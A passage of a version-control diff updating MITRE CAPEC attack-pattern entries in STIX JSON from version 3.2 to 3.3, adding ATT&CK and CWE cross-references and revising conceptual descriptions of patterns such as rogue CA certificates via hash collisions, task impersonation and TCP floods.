"modified": "2019-04-04T00:00:00.000Z",
"modified": "2020-07-30T00:00:00.000Z",
"name": "Modification During Manufacture",
"description": "An attacker modifies a technology, product, or component during a stage in its manufacture for the purpose of carrying out an attack against some entity involved in the supply chain lifecycle. There are an almost limitless number of ways an attacker can modify a technology when they are involved in its manufacture, as the attacker has potential inroads to the software composition, hardware design and assembly, firmware, or basic design mechanics. Additionally, manufacturing of key components is often outsourced with the final product assembled by the primary manufacturer. The greatest risk, however, is deliberate manipulation of design specifications to produce malicious hardware or devices. There are billions of transistors in a single integrated circuit and studies have shown that fewer than 10 transistors are required to create malicious functionality.",
"external_references": [
@@ -17,6 +17,24 @@
"url": "https://capec.mitre.org/data/definitions/438.html",
"external_id": "CAPEC-438"
},
{
"source_name": "ATTACK",
"description": "Supply Chain Compromise:Compromise Software Dependencies and Development Tools",
"url": "https://attack.mitre.org/wiki/Technique/T1195/001",
"external_id": "T1195.001"
},
{
"source_name": "ATTACK",
"description": "Supply Chain Compromise:Compromise Software Supply Chain",
"url": "https://attack.mitre.org/wiki/Technique/T1195/002",
"external_id": "T1195.002"
},
{
"source_name": "ATTACK",
"description": "Supply Chain Compromise:Compromise Hardware Supply Chain",
"url": "https://attack.mitre.org/wiki/Technique/T1195/003",
"external_id": "T1195.003"
},
{
"source_name": "reference_from_CAPEC",
"description": "Information Technology Laboratory, Supply Chain Risk Management (SCRM), 2010, National Institute of Standards and Technology (NIST)",
@@ -43,7 +61,7 @@
],
"x_capec_abstraction": "Meta",
"x_capec_status": "Draft",
"x_capec_version": "3.2"
"x_capec_version": "3.3"
}
]
}
capec/attack-pattern/attack-pattern--138c8405-1295-44b9-b2ed-3b4cd15c2a55.json
+36 -6
View File
@@ -1,6 +1,6 @@
{
"type": "bundle",
"id": "bundle--5d4c48ac-e10e-46b0-9ccd-346b31e4711f",
"id": "bundle--482a2dc5-1998-42be-8a15-2168de00ffa5",
"spec_version": "2.0",
"objects": [
{
@@ -8,9 +8,9 @@
"id": "attack-pattern--138c8405-1295-44b9-b2ed-3b4cd15c2a55",
"created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
"created": "2014-06-23T00:00:00.000Z",
"modified": "2018-07-31T00:00:00.000Z",
"modified": "2020-07-30T00:00:00.000Z",
"name": "Creating a Rogue Certification Authority Certificate",
"description": "An adversary exploits a weakness in the MD5 hash algorithm (weak collision resistance) to generate a certificate signing request (CSR) that contains collision blocks in the \"to be signed\" part. The adversary specially crafts two different, but valid X.509 certificates that when hashed with the MD5 algorithm would yield the same value. The adversary then sends the CSR for one of the certificates to the Certification Authority which uses the MD5 hashing algorithm. That request is completely valid and the Certificate Authority issues an X.509 certificate to the adversary which is signed with its private key. An adversary then takes that signed blob and inserts it into another X.509 certificate that the attacker generated. Due to the MD5 collision, both certificates, though different, hash to the same value and so the signed blob works just as well in the second certificate. The net effect is that the adversary's second X.509 certificate, which the Certification Authority has never seen, is now signed and validated by that Certification Authority. To make the attack more interesting, the second certificate could be not just a regular certificate, but rather itself a signing certificate. Thus the adversary is able to start their own Certification Authority that is anchored in its root of trust in the legitimate Certification Authority that has signed the attackers' first X.509 certificate. If the original Certificate Authority was accepted by default by browsers, so will now the Certificate Authority set up by the adversary and of course any certificates that it signs. So the adversary is now able to generate any SSL certificates to impersonate any web server, and the user's browser will not issue any warning to the victim. This can be used to compromise HTTPS communications and other types of systems where PKI and X.509 certificates may be used (e.g., VPN, IPSec).",
"description": "An adversary exploits a weakness resulting from using a hashing algorithm with weak collision resistance to generate a certificate signing request (CSR) that contains collision blocks in the \"to be signed\" part. The adversary specially crafts two different, but valid X.509 certificates that when hashed with a non-collision resistant hashing algorithm would yield the same value. The adversary then sends the CSR for one of the certificates to the Certification Authority which uses the targeted hashing algorithm. That request is completely valid and the Certificate Authority issues an X.509 certificate to the adversary which is signed with its private key. An adversary then takes that signed blob and inserts it into another X.509 certificate that the attacker generated. Due to the hash collision, both certificates, though different, hash to the same value and so the signed blob works just as well in the second certificate. The net effect is that the adversary's second X.509 certificate, which the Certification Authority has never seen, is now signed and validated by that Certification Authority. To make the attack more interesting, the second certificate could be not just a regular certificate, but rather itself a signing certificate. Thus the adversary is able to start their own Certification Authority that is anchored in its root of trust in the legitimate Certification Authority that has signed the attacker's first X.509 certificate. If the original Certificate Authority was accepted by default by browsers, so will the Certificate Authority set up by the adversary and of course any certificates that it signs. So the adversary is now able to generate any SSL certificates to impersonate any web server, and the user's browser will not issue any warning to the victim. This can be used to compromise HTTPS communications and other types of systems where PKI and X.509 certificates may be used (e.g., VPN, IPSec).",
"external_references": [
{
"source_name": "capec",
@@ -32,27 +32,57 @@
"url": "http://cwe.mitre.org/data/definitions/290.html",
"external_id": "CWE-290"
},
{
"source_name": "ATTACK",
"description": "Subvert Trust Controls:Install Root Certificate",
"url": "https://attack.mitre.org/wiki/Technique/T1553/004",
"external_id": "T1553.004"
},
{
"source_name": "reference_from_CAPEC",
"description": "Alexander Sotirov, Marc Stevens, Jacob Appelbaum, Arjen Lenstra, David Molnar, Dag Arne Osvik, Benne de Weger, MD5 Considered Harmful Today: Creating a Rogue CA Certificate, 2008--12---30, Phreedom.org",
"url": "http://www.phreedom.org/research/rogue-ca/",
"external_id": "REF-395"
},
{
"source_name": "reference_from_CAPEC",
"description": "Alexander Sotirov, Marc Stevens, Jacob Appelbaum, Arjen Lenstra, David Molnar, Dag Arne Osvik, Benne de Weger, MD5 considered harmful today, 2009--12",
"url": "https://www.win.tue.nl/hashclash/rogue-ca/#Ref",
"external_id": "REF-587"
}
],
"object_marking_refs": [
"marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d"
],
"x_capec_abstraction": "Detailed",
"x_capec_consequences": {
"Access_Control": [
"Gain Privileges"
],
"Authentication": [
"Gain Privileges"
]
},
"x_capec_example_instances": [
"\n <xhtml:div style=\"color:#32498D; font-weight:bold;\">MD5 Collisions</xhtml:div>\n <xhtml:p>The MD5 algorithm is not collision resistant, allowing attackers to use spoofing attacks to create rogue certificate Authorities.</xhtml:p>See also: CVE-2004-2761",
"\n <xhtml:div style=\"color:#32498D; font-weight:bold;\">SHA1 Collisions</xhtml:div>\n <xhtml:p>The SHA1 algorithm is not collision resistant, allowing attackers to use spoofing attacks to create rogue certificate Authorities.</xhtml:p>See also: CVE-2005-4900",
"\n <xhtml:div style=\"color:#32498D; font-weight:bold;\">PKI Infrastructure vulnerabilities</xhtml:div>\n <xhtml:p>Research has show significant vulnerabilities in PKI infrastructure. Trusted certificate authorities have been shown to use weak hashing algorithms after attacks have been demonstrated against those algorithms. Additionally, reliable methods have been demonstrated for generated MD5 collisions that could be used to generate malicious CSRs.</xhtml:p>\n "
],
"x_capec_likelihood_of_attack": "Medium",
"x_capec_prerequisites": [
"Certification Authority is using the MD5 hash function to generate the certificate hash to be signed"
"Certification Authority is using a hash function with insufficient collision resistance to generate the certificate hash to be signed"
],
"x_capec_resources_required": [
"Knowledge of a certificate authority that uses hashing algorithms with poor collision resistance",
"A valid certificate request and a malicious certificate request with identical hash values"
],
"x_capec_skills_required": {
"High": "An attacker must be able to craft two X.509 certificates that produce the same MD5 hash",
"High": "An attacker must be able to craft two X.509 certificates that produce the same hash value",
"Medium": "Knowledge needed to set up a certification authority"
},
"x_capec_status": "Draft",
"x_capec_typical_severity": "Very High",
"x_capec_version": "3.2"
"x_capec_version": "3.3"
}
]
}
capec/attack-pattern/attack-pattern--13b94aaa-9c95-487c-ad68-8c29d8ac0068.json
+2 -2
View File
@@ -1,6 +1,6 @@
{
"type": "bundle",
"id": "bundle--4ca02a6b-aa60-42bd-a7bc-576d2fd70d27",
"id": "bundle--ccd03264-cdc7-4672-915a-62f083b0ffcd",
"spec_version": "2.0",
"objects": [
{
@@ -38,7 +38,7 @@
],
"x_capec_status": "Stable",
"x_capec_typical_severity": "High",
"x_capec_version": "3.2"
"x_capec_version": "3.3"
}
]
}
capec/attack-pattern/attack-pattern--13d1d169-0023-41e2-952f-7d794844733b.json
+2 -2
View File
@@ -1,6 +1,6 @@
{
"type": "bundle",
"id": "bundle--ccfd3779-69a4-40a2-be70-ebc86083d716",
"id": "bundle--8a9ce915-cf0d-418c-9ffb-1986601ff7ef",
"spec_version": "2.0",
"objects": [
{
@@ -46,7 +46,7 @@
],
"x_capec_status": "Draft",
"x_capec_typical_severity": "Medium",
"x_capec_version": "3.2"
"x_capec_version": "3.3"
}
]
}
capec/attack-pattern/attack-pattern--13e147c3-7baa-4ec4-aafd-9135d46545cc.json
+33 -3
View File
@@ -1,6 +1,6 @@
{
"type": "bundle",
"id": "bundle--d7c2975b-595d-434f-8365-2a8d43ed0fa7",
"id": "bundle--ca81cd94-97b9-4563-b2a2-ae2689e5b981",
"spec_version": "2.0",
"objects": [
{
@@ -8,7 +8,7 @@
"id": "attack-pattern--13e147c3-7baa-4ec4-aafd-9135d46545cc",
"created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
"created": "2015-11-09T00:00:00.000Z",
"modified": "2019-04-04T00:00:00.000Z",
"modified": "2020-07-30T00:00:00.000Z",
"name": "Modify Existing Service",
"description": "When an operating system starts, it also starts programs called services or daemons. Modifying existing services may break existing services or may enable services that are disabled/not commonly used.",
"external_references": [
@@ -26,6 +26,36 @@
"source_name": "cwe",
"url": "http://cwe.mitre.org/data/definitions/522.html",
"external_id": "CWE-522"
},
{
"source_name": "ATTACK",
"description": "Create or Modify System Process:Systemd Service",
"url": "https://attack.mitre.org/wiki/Technique/T1543/002",
"external_id": "T1543.002"
},
{
"source_name": "ATTACK",
"description": "Create or Modify System Process:Windows Service",
"url": "https://attack.mitre.org/wiki/Technique/T1543/003",
"external_id": "T1543.003"
},
{
"source_name": "ATTACK",
"description": "Create or Modify System Process:Launch Daemon",
"url": "https://attack.mitre.org/wiki/Technique/T1543/004",
"external_id": "T1543.004"
},
{
"source_name": "ATTACK",
"description": "System Services:Launchctl",
"url": "https://attack.mitre.org/wiki/Technique/T1569/001",
"external_id": "T1569.001"
},
{
"source_name": "ATTACK",
"description": "System Services:Service Execution",
"url": "https://attack.mitre.org/wiki/Technique/T1569/002",
"external_id": "T1569.002"
}
],
"object_marking_refs": [
@@ -33,7 +63,7 @@
],
"x_capec_abstraction": "Detailed",
"x_capec_status": "Draft",
"x_capec_version": "3.2"
"x_capec_version": "3.3"
}
]
}
capec/attack-pattern/attack-pattern--140142cc-28cb-4506-bce6-b44128b7b9a7.json
+9 -3
View File
@@ -1,6 +1,6 @@
{
"type": "bundle",
"id": "bundle--9eb608d6-e404-4d8c-9a44-d64605e67f63",
"id": "bundle--b85333a9-2d83-44e8-a75e-d7f93ad0e17a",
"spec_version": "2.0",
"objects": [
{
@@ -8,7 +8,7 @@
"id": "attack-pattern--140142cc-28cb-4506-bce6-b44128b7b9a7",
"created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
"created": "2018-07-31T00:00:00.000Z",
"modified": "2019-09-30T00:00:00.000Z",
"modified": "2020-07-30T00:00:00.000Z",
"name": "Collect Data from Screen Capture",
"description": "An adversary gathers sensitive information by exploiting the system's screen capture functionality. Through screenshots, the adversary aims to see what happens on the screen over the course of an operation. The adversary can leverage information gathered in order to carry out further attacks.",
"external_references": [
@@ -21,6 +21,12 @@
"source_name": "cwe",
"url": "http://cwe.mitre.org/data/definitions/267.html",
"external_id": "CWE-267"
},
{
"source_name": "ATTACK",
"description": "Screen Capture",
"url": "https://attack.mitre.org/wiki/Technique/T1113",
"external_id": "T1113"
}
],
"object_marking_refs": [
@@ -44,7 +50,7 @@
},
"x_capec_status": "Draft",
"x_capec_typical_severity": "Medium",
"x_capec_version": "3.2"
"x_capec_version": "3.3"
}
]
}
capec/attack-pattern/attack-pattern--151ca16b-5acc-45db-bde8-19d204542a54.json
+8 -3
View File
@@ -1,6 +1,6 @@
{
"type": "bundle",
"id": "bundle--394e5612-6bf2-4297-bcd3-d467b51f5f1e",
"id": "bundle--0de78195-7ce8-430b-ba5d-5c7d93ffdc5c",
"spec_version": "2.0",
"objects": [
{
@@ -8,7 +8,7 @@
"id": "attack-pattern--151ca16b-5acc-45db-bde8-19d204542a54",
"created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
"created": "2014-06-23T00:00:00.000Z",
"modified": "2019-09-30T00:00:00.000Z",
"modified": "2020-07-30T00:00:00.000Z",
"name": "Force the System to Reset Values",
"description": "An attacker forces the target into a previous state in order to leverage potential weaknesses in the target dependent upon a prior configuration or state-dependent factors. Even in cases where an attacker may not be able to directly control the configuration of the targeted application, they may be able to reset the configuration to a prior state since many applications implement reset functions. Since these functions are usually intended as emergency features to return an application to a stable configuration if the current configuration degrades functionality, they may not be as strongly secured as other configuration options. The resetting of values is dangerous as it may enable undesired functionality, disable services, or modify access controls. At the very least this is a nuisance attack since the administrator will need to re-apply their configuration. At worst, this attack can open avenues for powerful attacks against the application, and, if it isn't obvious that the configuration has been reset, these vulnerabilities may be present a long time before they are notices.",
"external_references": [
@@ -21,6 +21,11 @@
"source_name": "cwe",
"url": "http://cwe.mitre.org/data/definitions/306.html",
"external_id": "CWE-306"
},
{
"source_name": "cwe",
"url": "http://cwe.mitre.org/data/definitions/1232.html",
"external_id": "CWE-1232"
}
],
"object_marking_refs": [
@@ -36,7 +41,7 @@
],
"x_capec_status": "Draft",
"x_capec_typical_severity": "Medium",
"x_capec_version": "3.2"
"x_capec_version": "3.3"
}
]
}
capec/attack-pattern/attack-pattern--158c1c58-9c44-4822-a8a4-6cb791c5b3cb.json
+2 -2
View File
@@ -1,6 +1,6 @@
{
"type": "bundle",
"id": "bundle--2f604e31-9688-49d1-b18f-8dd0ff211c24",
"id": "bundle--591a67ba-ccf7-4ac7-bf34-92b4cd9fc393",
"spec_version": "2.0",
"objects": [
{
@@ -35,7 +35,7 @@
],
"x_capec_status": "Draft",
"x_capec_typical_severity": "Medium",
"x_capec_version": "3.2"
"x_capec_version": "3.3"
}
]
}
capec/attack-pattern/attack-pattern--15e6b769-4cbd-4c39-b774-b45673fd55de.json
+15 -3
View File
@@ -1,6 +1,6 @@
{
"type": "bundle",
"id": "bundle--1d16ef81-f101-48ed-9677-382c83180eea",
"id": "bundle--a47cd2ad-e95d-49de-9cf2-c443fcd40bf4",
"spec_version": "2.0",
"objects": [
{
@@ -8,7 +8,7 @@
"id": "attack-pattern--15e6b769-4cbd-4c39-b774-b45673fd55de",
"created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
"created": "2018-05-31T00:00:00.000Z",
"modified": "2019-04-04T00:00:00.000Z",
"modified": "2020-07-30T00:00:00.000Z",
"name": "Replace Binaries",
"description": "Adversaries know that certain binaries will be regularly executed as part of normal processing. If these binaries are not protected with the appropriate file system permissions, it could be possible to replace them with malware. This malware might be executed at higher system permission levels. A variation of this pattern is to discover self-extracting installation packages that unpack binaries to directories with weak file permissions which it does not clean up appropriately. These binaries can be replaced by malware, which can then be executed.",
"external_references": [
@@ -21,6 +21,18 @@
"source_name": "cwe",
"url": "http://cwe.mitre.org/data/definitions/732.html",
"external_id": "CWE-732"
},
{
"source_name": "ATTACK",
"description": "Hijack Execution Flow:Executable Installer File Permissions Weakness",
"url": "https://attack.mitre.org/wiki/Technique/T1574/005",
"external_id": "T1574.005"
},
{
"source_name": "ATTACK",
"description": "Hijack Execution Flow:Service File Permissions Weakness",
"url": "https://attack.mitre.org/wiki/Technique/T1574/010",
"external_id": "T1574.010"
}
],
"object_marking_refs": [
@@ -36,7 +48,7 @@
],
"x_capec_status": "Draft",
"x_capec_typical_severity": "High",
"x_capec_version": "3.2"
"x_capec_version": "3.3"
}
]
}
capec/attack-pattern/attack-pattern--165b75a3-3e50-492c-8f1a-af979dc5af12.json
+3 -2
View File
@@ -1,6 +1,6 @@
{
"type": "bundle",
"id": "bundle--31671666-eb8c-472d-acde-b389a062bde4",
"id": "bundle--1005a6a5-f870-47a5-b920-fe80fe1b7a0c",
"spec_version": "2.0",
"objects": [
{
@@ -48,6 +48,7 @@
"A WSDL interface may expose a function vulnerable to SQL Injection.",
"\n <xhtml:p>The Web Services Description Language (WSDL) allows a web service to advertise its capabilities by describing operations and parameters needed to access the service. As discussed in step 5 of this series, WSDL is often generated automatically, using utilities such as Java2WSDL, which takes a class or interface and builds a WSDL file in which interface methods are exposed as web services.</xhtml:p>\n <xhtml:p>Because WSDL generation often is automated, enterprising adversaries can use WSDL to gain insight into the both public and private services. For example, an organization converting legacy application functionality to a web services framework may inadvertently pass interfaces not intended for public consumption to a WSDL generation tool. The result will be SOAP interfaces that give access to private methods.</xhtml:p>\n <xhtml:p>Another, more subtle WSDL attack occurs when an enterprising attacker uses naming conventions to guess the names of unpublished methods that may be available on the server. For example, a service that offers a stock quote and trading service may publish query methods such as requestStockQuote in its WSDL. However, similar unpublished methods may be available on the server but not listed in the WSDL, such as executeStockQuote. A persistent adversary with time and a library of words and phrases can cycle thru common naming conventions (get, set, update, modify, and so on) to discover unpublished application programming interfaces that open doors into private data and functionality.</xhtml:p>\n <xhtml:p>Source : \"Seven Steps to XML Mastery, Step 7: Ensure XML Security\", Frank Coyle. See reference section.</xhtml:p>\n "
],
"x_capec_execution_flow": "<h2> Execution Flow </h2><div><h3>Explore</h3><ol><li> <p>The first step is exploratory meaning the attacker scans for WSDL documents. The WDSL document written in XML is like a handbook on how to communicate with the web services provided by the target host. It provides an open view of the application (function details, purpose, functional break down, entry points, message types, etc.). This is very useful information for the attacker.</p></li></ol></div><div><h3>Experiment</h3><ol><li> <p>The second step that an attacker would undertake is to analyze the WSDL files and try to find potential weaknesses by sending messages matching the pattern described in the WSDL file. The attacker could run through all of the operations with different message request patterns until a breach is identified.</p></li></ol></div><div><h3>Exploit</h3><ol><li> <p>Once an attacker finds a potential weakness, they can craft malicious content to be sent to the system. For instance the attacker may try to submit special characters and observe how the system reacts to an invalid request. The message sent by the attacker may not be XML validated and cause unexpected behavior.</p></li></ol></div>",
"x_capec_likelihood_of_attack": "High",
"x_capec_prerequisites": [
"A client program connecting to a web service can read the WSDL to determine what functions are available on the server.",
@@ -59,7 +60,7 @@
},
"x_capec_status": "Draft",
"x_capec_typical_severity": "High",
"x_capec_version": "3.2"
"x_capec_version": "3.3"
}
]
}
capec/attack-pattern/attack-pattern--16a18e0c-676c-4fac-89c7-6a7ab96666f4.json
+2 -2
View File
@@ -1,6 +1,6 @@
{
"type": "bundle",
"id": "bundle--55eaa780-1fbe-406d-bafb-9c6a51b85515",
"id": "bundle--28b4b281-1499-4770-9e26-e5baea08a334",
"spec_version": "2.0",
"objects": [
{
@@ -75,7 +75,7 @@
],
"x_capec_status": "Stable",
"x_capec_typical_severity": "Low",
"x_capec_version": "3.2"
"x_capec_version": "3.3"
}
]
}
capec/attack-pattern/attack-pattern--172e2289-333b-4796-9afd-94140c9480e8.json
+15 -3
View File
@@ -1,6 +1,6 @@
{
"type": "bundle",
"id": "bundle--b6dda945-272c-49b4-9507-3016b0072c68",
"id": "bundle--579f2dac-d494-4233-963b-a456d4b87b98",
"spec_version": "2.0",
"objects": [
{
@@ -8,7 +8,7 @@
"id": "attack-pattern--172e2289-333b-4796-9afd-94140c9480e8",
"created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
"created": "2014-06-23T00:00:00.000Z",
"modified": "2019-04-04T00:00:00.000Z",
"modified": "2020-07-30T00:00:00.000Z",
"name": "TCP Flood",
"description": "An adversary may execute a flooding attack using the TCP protocol with the intent to deny legitimate users access to a service. These attacks exploit the weakness within the TCP protocol where there is some state information for the connection the server needs to maintain.",
"external_references": [
@@ -21,6 +21,18 @@
"source_name": "cwe",
"url": "http://cwe.mitre.org/data/definitions/770.html",
"external_id": "CWE-770"
},
{
"source_name": "ATTACK",
"description": "Endpoint Denial of Service:OS Exhaustion Flood",
"url": "https://attack.mitre.org/wiki/Technique/T1499/001",
"external_id": "T1499.001"
},
{
"source_name": "ATTACK",
"description": "Endpoint Denial of Service:Application or System Exploitation",
"url": "https://attack.mitre.org/wiki/Technique/T1499/004",
"external_id": "T1499.004"
}
],
"object_marking_refs": [
@@ -31,7 +43,7 @@
"This type of an attack requires the ability to generate a large amount of TCP traffic to send to the target port of a functioning server."
],
"x_capec_status": "Draft",
"x_capec_version": "3.2"
"x_capec_version": "3.3"
}
]
}
capec/attack-pattern/attack-pattern--17593c9a-d8a0-4ef3-8da1-9d948426bbb8.json
+2 -2
View File
@@ -1,6 +1,6 @@
{
"type": "bundle",
"id": "bundle--8cb18a78-fa2f-49f6-8262-47bc38e20d37",
"id": "bundle--f577f288-9e07-469a-905b-672d1c6399d6",
"spec_version": "2.0",
"objects": [
{
@@ -35,7 +35,7 @@
},
"x_capec_status": "Draft",
"x_capec_typical_severity": "Low",
"x_capec_version": "3.2"
"x_capec_version": "3.3"
}
]
}
capec/attack-pattern/attack-pattern--177d22be-7b76-4726-8085-61756f95c0ce.json
+2 -2
View File
@@ -1,6 +1,6 @@
{
"type": "bundle",
"id": "bundle--c3e1e3bb-a05d-4e1f-86d7-746e79b83299",
"id": "bundle--3f8d7599-4d76-4d87-9cf5-74e2974dec2c",
"spec_version": "2.0",
"objects": [
{
@@ -30,7 +30,7 @@
],
"x_capec_status": "Draft",
"x_capec_typical_severity": "Medium",
"x_capec_version": "3.2"
"x_capec_version": "3.3"
}
]
}
capec/attack-pattern/attack-pattern--1809fa36-f249-4e55-80ab-26570fd24cab.json
+2 -2
View File
@@ -1,6 +1,6 @@
{
"type": "bundle",
"id": "bundle--8c9384be-262c-449d-9c97-cc58b2af1218",
"id": "bundle--683d3f49-c259-4890-8ebe-fd22285ce28b",
"spec_version": "2.0",
"objects": [
{
@@ -28,7 +28,7 @@
],
"x_capec_abstraction": "Standard",
"x_capec_status": "Draft",
"x_capec_version": "3.2"
"x_capec_version": "3.3"
}
]
}
capec/attack-pattern/attack-pattern--180aa01f-65a0-4400-a174-7b0f1605db0c.json
+2 -2
View File
@@ -1,6 +1,6 @@
{
"type": "bundle",
"id": "bundle--92c9d12e-2c39-4916-851a-b8d2e5a6c957",
"id": "bundle--70697c24-281a-448f-8101-36168df14deb",
"spec_version": "2.0",
"objects": [
{
@@ -59,7 +59,7 @@
},
"x_capec_status": "Draft",
"x_capec_typical_severity": "Medium",
"x_capec_version": "3.2"
"x_capec_version": "3.3"
}
]
}
capec/attack-pattern/attack-pattern--19015961-475c-438b-887b-e3d66a9143de.json
+2 -2
View File
@@ -1,6 +1,6 @@
{
"type": "bundle",
"id": "bundle--7ae0d04b-ae05-46f4-9b17-389a2adcd5fb",
"id": "bundle--4cc6f63d-0ace-43eb-b513-d540597c2ace",
"spec_version": "2.0",
"objects": [
{
@@ -28,7 +28,7 @@
],
"x_capec_abstraction": "Detailed",
"x_capec_status": "Draft",
"x_capec_version": "3.2"
"x_capec_version": "3.3"
}
]
}
capec/attack-pattern/attack-pattern--191fbdab-d3b3-4ffd-8829-51331c20eaa7.json
+39 -3
View File
@@ -1,6 +1,6 @@
{
"type": "bundle",
"id": "bundle--50879d03-250d-410a-8734-2302bd82c60b",
"id": "bundle--c2750406-8c03-4e0a-b9b9-e701bd9426bf",
"spec_version": "2.0",
"objects": [
{
@@ -8,7 +8,7 @@
"id": "attack-pattern--191fbdab-d3b3-4ffd-8829-51331c20eaa7",
"created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
"created": "2014-06-23T00:00:00.000Z",
"modified": "2019-09-30T00:00:00.000Z",
"modified": "2020-07-30T00:00:00.000Z",
"name": "Pull Data from System Resources",
"description": "An adversary who is authorized or has the ability to search known system resources, does so with the intention of gathering useful information. System resources include files, memory, and other aspects of the target system. In this pattern of attack, the adversary does not necessarily know what they are going to find when they start pulling data. This is different than CAPEC-150 where the adversary knows what they are looking for due to the common location.",
"external_references": [
@@ -16,6 +16,42 @@
"source_name": "capec",
"url": "https://capec.mitre.org/data/definitions/545.html",
"external_id": "CAPEC-545"
},
{
"source_name": "cwe",
"url": "http://cwe.mitre.org/data/definitions/1239.html",
"external_id": "CWE-1239"
},
{
"source_name": "cwe",
"url": "http://cwe.mitre.org/data/definitions/1243.html",
"external_id": "CWE-1243"
},
{
"source_name": "cwe",
"url": "http://cwe.mitre.org/data/definitions/1258.html",
"external_id": "CWE-1258"
},
{
"source_name": "cwe",
"url": "http://cwe.mitre.org/data/definitions/1266.html",
"external_id": "CWE-1266"
},
{
"source_name": "cwe",
"url": "http://cwe.mitre.org/data/definitions/1272.html",
"external_id": "CWE-1272"
},
{
"source_name": "cwe",
"url": "http://cwe.mitre.org/data/definitions/1278.html",
"external_id": "CWE-1278"
},
{
"source_name": "ATTACK",
"description": "Credentials from Password Stores:Keychain",
"url": "https://attack.mitre.org/wiki/Technique/T1555/001",
"external_id": "T1555.001"
}
],
"object_marking_refs": [
@@ -23,7 +59,7 @@
],
"x_capec_abstraction": "Standard",
"x_capec_status": "Draft",
"x_capec_version": "3.2"
"x_capec_version": "3.3"
}
]
}
capec/attack-pattern/attack-pattern--1995c522-a25d-46e4-b024-65172771a692.json
+33 -6
View File
@@ -1,6 +1,6 @@
{
"type": "bundle",
"id": "bundle--a060b1a0-dc9e-4a3d-913a-52c16b098e73",
"id": "bundle--8bfcf067-0b19-45ba-99ea-06594e771c14",
"spec_version": "2.0",
"objects": [
{
@@ -8,9 +8,9 @@
"id": "attack-pattern--1995c522-a25d-46e4-b024-65172771a692",
"created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
"created": "2014-06-23T00:00:00.000Z",
"modified": "2019-09-30T00:00:00.000Z",
"modified": "2020-07-30T00:00:00.000Z",
"name": "Task Impersonation",
"description": "An adversary, through a previously installed malicious application, monitors the task list maintained by the operating system and waits for a specific legitimate task to become active. Once the task is detected, the malicious application launches a new task in the foreground that mimics the user interface of the legitimate task. At this point, the user thinks that they are interacting with the legitimate task that they started, but instead they are interacting with the malicious application. This type of attack is most often used to obtain sensitive information (e.g., credentials) from the user. Once the adversary's goal is reached, the malicious application can exit, leaving the original trusted application visible and the appearance that nothing out of the ordinary has occurred.",
"description": "An adversary, through a previously installed malicious application, impersonates an expected or routine task in an attempt to steal sensitive information or leverage a user's privileges. When impersonating an expected task, the adversary monitors the task list maintained by the operating system and waits for a specific legitimate task to become active. Once the task is detected, the malicious application launches a new task in the foreground that mimics the user interface of the legitimate task. At this point, the user thinks that they are interacting with the legitimate task that they started, but instead they are interacting with the malicious application. Once the adversary's goal is reached, the malicious application can exit, leaving the original trusted application visible and the appearance that nothing out of the ordinary has occurred. A second approach entails the adversary impersonating an unexpected task, but one that may often be spawned by legitimate background processes. For example, an adversary may randomly impersonate a system credential prompt, implying that a background process requires authentication for some purpose. The user, believing they are interacting with a legitimate task, enters their credentials or authorizes the use of their stored credentials, which the adversary then leverages for nefarious purposes. This type of attack is most often used to obtain sensitive information (e.g., credentials) from the user, but may also be used to ride the user's privileges.",
"external_references": [
{
"source_name": "capec",
@@ -32,9 +32,36 @@
"object_marking_refs": [
"marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d"
],
"x_capec_abstraction": "Detailed",
"x_capec_status": "Draft",
"x_capec_version": "3.2"
"x_capec_abstraction": "Standard",
"x_capec_consequences": {
"Access_Control": [
"Gain Privileges"
],
"Authentication": [
"Gain Privileges"
]
},
"x_capec_example_instances": [
"An adversary monitors the system task list for Microsoft Outlook in an attempt to determine when the application may prompt the user to enter their credentials to view encrypted email. Once the task is executed, the adversary impersonates the credential prompt to obtain the user's Microsoft Outlook encryption credentials. These credentials can then be leveraged by the adversary to read a user's encrypted email.",
"An adversary prompts a user to authorize an elevation of privileges, implying that a background task needs additional permissions to execute. The user accepts the privilege elevation, allowing the adversary to execute additional malware or tasks with the user's privileges."
],
"x_capec_execution_flow": "<h2> Execution Flow </h2><div><h3>Explore</h3><ol><li> <p> <b>Determine suitable tasks to exploit: </b>Determine what tasks exist on the target system that may result in a user providing sensitive information.</p></li><table><tbody><tr><th>Techniques</th></tr><tr><td>Determine what tasks prompt a user for their credentials.</td></tr><tr><td>Determine what tasks may prompt a user to authorize a process to execute with elevated privileges.</td></tr></tbody></table></ol></div><div><h3>Exploit</h3><ol><li> <p> <b>Impersonate Task: </b>Impersonate a legitimate task, either expected or unexpected, in an attempt to gain user credentials or to ride the user's privileges.</p></li><table><tbody><tr><th>Techniques</th></tr><tr><td>Prompt a user for their credentials, while making the user believe the credential request is legitimate.</td></tr><tr><td>Prompt a user to authorize a task to run with elevated privileges, while making the user believe the request is legitimate.</td></tr></tbody></table></ol></div>",
"x_capec_likelihood_of_attack": "Medium",
"x_capec_prerequisites": [
"The adversary must already have access to the target system via some means.",
"A legitimate task must exist that an adversary can impersonate to glean credentials.",
"The user's privileges allow them to execute certain tasks with elevated privileges."
],
"x_capec_resources_required": [
"Malware or some other means to initially comprise the target system.",
"Additional malware to impersonate a legitimate task."
],
"x_capec_skills_required": {
"Low": "Once an adversary has gained access to the target system, impersonating a task is trivial."
},
"x_capec_status": "Stable",
"x_capec_typical_severity": "High",
"x_capec_version": "3.3"
}
]
}
capec/attack-pattern/attack-pattern--19f01fde-7707-4938-afb5-daa22bf8c93f.json
+2 -2
View File
@@ -1,6 +1,6 @@
{
"type": "bundle",
"id": "bundle--0474e6df-9d86-4a7c-b138-2040c6d9f8a8",
"id": "bundle--1e2770a9-74ca-41d3-86c7-93a69aa2747a",
"spec_version": "2.0",
"objects": [
{
@@ -23,7 +23,7 @@
],
"x_capec_abstraction": "Detailed",
"x_capec_status": "Deprecated",
"x_capec_version": "3.2"
"x_capec_version": "3.3"
}
]
}
capec/attack-pattern/attack-pattern--1a84fe86-379b-497e-ae66-290e797409f4.json
